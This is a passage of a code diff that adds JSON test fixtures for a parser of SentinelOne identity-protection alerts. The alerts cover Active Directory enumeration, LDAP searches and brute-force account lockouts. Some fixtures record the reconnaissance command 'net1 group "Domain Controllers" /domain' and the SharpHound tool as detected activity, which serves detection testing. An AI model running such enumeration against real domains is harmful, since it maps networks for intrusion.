"product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "C:\\Windows\\system32\\net1 group \"Domain Controllers\" /domain", + "executable": "c:\\windows\\system32\\net1.exe", + "hash": { + "sha256": "18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398" + }, + "name": "net1.exe" + }, + "related": { + "hash": [ + "18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "ba485919-e4c1-4496-9e2f-feb320f6841a", + "name": "Domain Controller Discovery Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_10.json b/SentinelOne/identity/tests/test_alert_10.json new file mode 100644 index 000000000..deb56e2a5 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_10.json @@ -0,0 +1,34 @@ +{ + "input": { + "message": "{\"id\": \"01935322-7b49-71f0-89e0-f52562c26e53\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:09:48.731Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:09:48.731Z\", \"lastSeenAt\": \"2024-11-22T09:09:48.731Z\", \"process\": null, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935322-7b49-71f0-89e0-f52562c26e53\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:09:48.731Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:09:48.731Z\", \"lastSeenAt\": \"2024-11-22T09:09:48.731Z\", \"process\": null, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T09:09:48.731000Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.", + "start": "2024-11-22T09:09:48.731000Z", + "type": "info" + }, + "@timestamp": "2024-11-22T09:09:48.731000Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "UNKNOWN", + "confidenceLevel": "MALICIOUS", + "id": "01935322-7b49-71f0-89e0-f52562c26e53", + "name": "Brute force attack - Mass Account Lockout", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_11.json b/SentinelOne/identity/tests/test_alert_11.json new file mode 100644 index 000000000..84d64cee6 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_11.json @@ -0,0 +1,47 @@ +{ + "input": { + "message": "{\"id\": \"01935310-d00e-7616-81b9-fcb227ebb13d\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-d00e-7616-81b9-fcb227ebb13d\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T08:45:51Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.", + "start": "2024-11-22T08:45:51Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:51Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-d00e-7616-81b9-fcb227ebb13d", + "name": "Domain Controller Discovery Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_12.json b/SentinelOne/identity/tests/test_alert_12.json new file mode 100644 index 000000000..3e75c9e78 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_12.json @@ -0,0 +1,47 @@ +{ + "input": { + "message": "{\"id\": \"01935310-eb28-7a57-9c27-87843b2cec61\", \"name\": \"AD Service Account Enumeration Detected\", \"description\": \"This event is generated when LDAP queries for enumerating service accounts are detected from an endpoint.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-eb28-7a57-9c27-87843b2cec61\", \"name\": \"AD Service Account Enumeration Detected\", \"description\": \"This event is generated when LDAP queries for enumerating service accounts are detected from an endpoint.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T08:45:51Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is generated when LDAP queries for enumerating service accounts are detected from an endpoint.", + "start": "2024-11-22T08:45:51Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:51Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-eb28-7a57-9c27-87843b2cec61", + "name": "AD Service Account Enumeration Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_13.json b/SentinelOne/identity/tests/test_alert_13.json new file mode 100644 index 000000000..d94a9c18b --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_13.json @@ -0,0 +1,47 @@ +{ + "input": { + "message": "{\"id\": \"01935310-c715-72c9-bbd9-dc1ff6a7ff1e\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-c715-72c9-bbd9-dc1ff6a7ff1e\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T08:45:50Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.", + "start": "2024-11-22T08:45:50Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:50Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-c715-72c9-bbd9-dc1ff6a7ff1e", + "name": "AD Domain Computer Enumeration Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_14.json b/SentinelOne/identity/tests/test_alert_14.json new file mode 100644 index 000000000..f8a4295bb --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_14.json @@ -0,0 +1,47 @@ +{ + "input": { + "message": "{\"id\": \"01935310-cb9b-770e-96ee-632d4d21520b\", \"name\": \"AD ACL Enumeration\", \"description\": \"This event is generated when a command used to query or read the ACL's\\\\ Permission of any object in Active Directory.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-cb9b-770e-96ee-632d4d21520b\", \"name\": \"AD ACL Enumeration\", \"description\": \"This event is generated when a command used to query or read the ACL's\\\\ Permission of any object in Active Directory.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T08:45:50Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is generated when a command used to query or read the ACL's\\ Permission of any object in Active Directory.", + "start": "2024-11-22T08:45:50Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:50Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-cb9b-770e-96ee-632d4d21520b", + "name": "AD ACL Enumeration", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_15.json b/SentinelOne/identity/tests/test_alert_15.json new file mode 100644 index 000000000..3d07d62a5 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_15.json @@ -0,0 +1,47 @@ +{ + "input": { + "message": "{\"id\": \"01935310-d4ba-7131-9e08-defa8b3aeb52\", \"name\": \"Domain Users Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the users in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-d4ba-7131-9e08-defa8b3aeb52\", \"name\": \"Domain Users Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the users in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T08:45:50Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to dump all the users in the Active Directory Domain.", + "start": "2024-11-22T08:45:50Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:50Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-d4ba-7131-9e08-defa8b3aeb52", + "name": "Domain Users Enumeration Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_2.json b/SentinelOne/identity/tests/test_alert_2.json new file mode 100644 index 000000000..0a9dc292d --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_2.json @@ -0,0 +1,47 @@ +{ + "input": { + "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T08:45:50Z", + "kind": "alert", + "provider": "Identity", + "reason": "This events is raised when a LDAP search Query is detected from the endpoint.", + "start": "2024-11-22T08:45:50Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:50Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-dc47-75de-8925-5f026bd5a705", + "name": "LDAP Search Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_3.json b/SentinelOne/identity/tests/test_alert_3.json new file mode 100644 index 000000000..cbc475032 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_3.json @@ -0,0 +1,34 @@ +{ + "input": { + "message": "{\"id\": \"01935359-3eda-7903-93fc-af6a0e5d0a8f\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:37.779Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:37.779Z\", \"lastSeenAt\": \"2024-11-22T10:09:37.779Z\", \"process\": null, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935359-3eda-7903-93fc-af6a0e5d0a8f\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:37.779Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:37.779Z\", \"lastSeenAt\": \"2024-11-22T10:09:37.779Z\", \"process\": null, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T10:09:37.779000Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.", + "start": "2024-11-22T10:09:37.779000Z", + "type": "info" + }, + "@timestamp": "2024-11-22T10:09:37.779000Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "UNKNOWN", + "confidenceLevel": "MALICIOUS", + "id": "01935359-3eda-7903-93fc-af6a0e5d0a8f", + "name": "Brute force attack - Mass Account Lockout", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_4.json b/SentinelOne/identity/tests/test_alert_4.json new file mode 100644 index 000000000..64efcfc10 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_4.json @@ -0,0 +1,34 @@ +{ + "input": { + "message": "{\"id\": \"01935358-ee81-7eb7-b57f-022c6f0019a9\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:17.184Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:17.184Z\", \"lastSeenAt\": \"2024-11-22T10:09:17.184Z\", \"process\": null, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935358-ee81-7eb7-b57f-022c6f0019a9\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T10:09:17.184Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T10:09:17.184Z\", \"lastSeenAt\": \"2024-11-22T10:09:17.184Z\", \"process\": null, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T10:09:17.184000Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.", + "start": "2024-11-22T10:09:17.184000Z", + "type": "info" + }, + "@timestamp": "2024-11-22T10:09:17.184000Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "UNKNOWN", + "confidenceLevel": "MALICIOUS", + "id": "01935358-ee81-7eb7-b57f-022c6f0019a9", + "name": "Brute force attack - Mass Account Lockout", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_5.json b/SentinelOne/identity/tests/test_alert_5.json new file mode 100644 index 000000000..6e14dbe24 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_5.json @@ -0,0 +1,47 @@ +{ + "input": { + "message": "{\"id\": \"0193534d-63c1-7497-b854-b883425af3f5\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:54:58.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:54:58.000Z\", \"lastSeenAt\": \"2024-11-22T09:54:58.000Z\", \"process\": {\"cmdLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\", \"file\": {\"path\": \"c:\\\\windows\\\\system32\\\\cmd.exe\", \"sha1\": null, \"sha256\": \"4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"0193534d-63c1-7497-b854-b883425af3f5\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:54:58.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:54:58.000Z\", \"lastSeenAt\": \"2024-11-22T09:54:58.000Z\", \"process\": {\"cmdLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\", \"file\": {\"path\": \"c:\\\\windows\\\\system32\\\\cmd.exe\", \"sha1\": null, \"sha256\": \"4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T09:54:58Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.", + "start": "2024-11-22T09:54:58Z", + "type": "info" + }, + "@timestamp": "2024-11-22T09:54:58Z", + "observer": { + 